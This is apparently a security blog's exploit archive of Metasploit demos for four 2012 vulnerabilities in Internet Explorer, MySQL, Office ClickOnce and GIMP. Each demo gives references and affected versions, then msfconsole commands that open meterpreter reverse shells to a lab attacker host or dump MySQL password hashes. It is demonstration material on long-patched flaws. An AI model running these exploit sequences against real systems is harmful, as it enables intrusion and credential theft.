Category Archives: Exploits

All my posts regarding exploits, PoCs and 0days.

MS12-037 Internet Explorer Same ID Vulnerability Metasploit Demo

Timeline :

Vulnerability found exploited in the wild
Public release of the vulnerability the 2012-06-12
Metasploit PoC provided the 2012-06-13

PoC provided by :

Dark Son
Qihoo 360 Security Center
Yichong Lin
Google Inc.
juan vazquez

Reference(s) :

MS12-037
CVE-2012-1875
OSVDB-82865
https://twitter.com/binjo/status/212795802974830592

Affected version(s) :

Internet Explorer 6
Internet Explorer 7
Internet Explorer 8
Internet Explorer 9

Tested on Windows XP Pro SP3 with :

Internet Explorer 8 (8.0.6001.18702) and msvcrt ROP

Description :

This module exploits a memory corruption flaw in Internet Explorer 8 when handling objects with the same ID property. At the moment this module targets IE8 over Windows XP SP3 through the heap massaging plus heap spray as exploited in the wild.

Commands :

use exploit/windows/browser/ms12_037_same_id
set SRVHOST 192.168.178.100
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.100
exploit

sysinfo
getuid

CVE-2012-2122 Oracle MySQL Authentication Bypass Password Dump Metasploit Demo

Timeline :

Vulnerability discovered by Sergei Golubchik in April 2012
Bug reported to vendor by Sergei Golubchik the 2012-04-06
Public release of the vulnerability the 2012-06-09
Metasploit PoC provided the 2012-06-11

PoC provided by :

Yorick Koster
jcran

Reference(s) :

CVE-2012-2122
Oracle MySQL BUG 64884
Oracle MySQL 5.1.63 Changes
Oracle MySQL 5.5.24 Changes

Affected version(s) :

Oracle MySQL versions before or equal to 5.1.61 (on some platforms)
Oracle MySQL versions before or equal to 5.5.24 (on some platforms)

Tested on Fedora release 16 (Verne) with :

5.5.23 MySQL Community Server

Description :

The targeted username will need to have allowed remote connections, like :

grant all on *.* to root@'%' identified by 'password';

This module exploits a password bypass vulnerability in MySQL in order to extract the usernames and encrypted password hashes from a MySQL server. These hashes ares stored as loot for later cracking.

Commands :

use auxiliary/scanner/mysql/mysql_authbypass_hashdump
set RHOSTS 192.168.178.43
set USERNAME root
run

MS12-005 Microsoft Office ClickOnce Vulnerability Metasploit Demo

Timeline :

Vulnerability discovered by Yorick Koster in Jun 2010
Coordinated public release of the vulnerability the 2012-01-10
Metasploit PoC provided the 2012-06-10

PoC provided by :

Yorick Koster
sinn3r

Reference(s) :

MS12-005
CVE-2012-0013
OSVDB-78207
BID-51284

Affected version(s) :

Windows XP SP3
Windows XP Professional x64 SP2
Windows Server 2003 SP2
Windows Server 2003 x64 SP2
Windows Vista SP2
Windows Vista x64 SP2
Windows Server 2008 32 SP2
Windows Server 2008 x64 Service Pack 2
Windows 7 32
Windows 7 32 SP1
Windows 7 x64
Windows 7 x64 SP1
Windows Server 2008 R2 x64
Windows Server 2008 R2 x64 SP1

Tested on Windows XP Pro SP3 with :

Microsoft Office Word 2007 (12.0.4518.1014)

Description :

The target will need an installation of Ruby or Python in order to execute the payload. Also macro execution in Word should be allowed.

This module exploits a vulnerability found in Microsoft Office’s ClickOnce feature. When handling a Macro document, the application fails to recognize certain file extensions as dangerous executables, which can be used to bypass the warning message. This allows you to trick your victim into opening the malicious document, which will load up either a python or ruby payload based on your choosing, and then finally download and execute our executable.

Commands :

use exploit/windows/fileformat/ms12_005
set SRVHOST 192.168.178.100
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.100
exploit

getuid
sysinfo

CVE-2012-2763 GIMP script-fu Server Buffer Overflow Metasploit Demo

Timeline :

Vulnerability discovered by Joseph Sheridan the 2012-05-18
Public release of the vulnerability the 2012-05-19
Metasploit PoC provided the 2012-06-01

PoC provided by :

Joseph Sheridan
juan vazquez

Reference(s) :

CVE-2012-2763
OSVDB-82429
EDB-ID-18956
BID-53741

Affected version(s) :

All versions before or equal to GIMP 2.6.12 (Windows or Linux builds)

Tested on Windows XP Pro SP3 with :

GIMP 2.6.10

Description :

This module exploits a buffer overflow in the script-fu server component on GIMP versions before or equal to 2.6.12. By sending a specially crafted packet, an attacker may be able to achieve remote code execution under the context of the user. This module has been tested on GIMP for Windows from installers provided by Jernej Simoncic.

Commands :

use exploit/windows/misc/gimp_script_fu
set RHOST 192.168.178.22
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.100

nmap -p 10008 192.168.178.22

exploit

getuid
sysinfo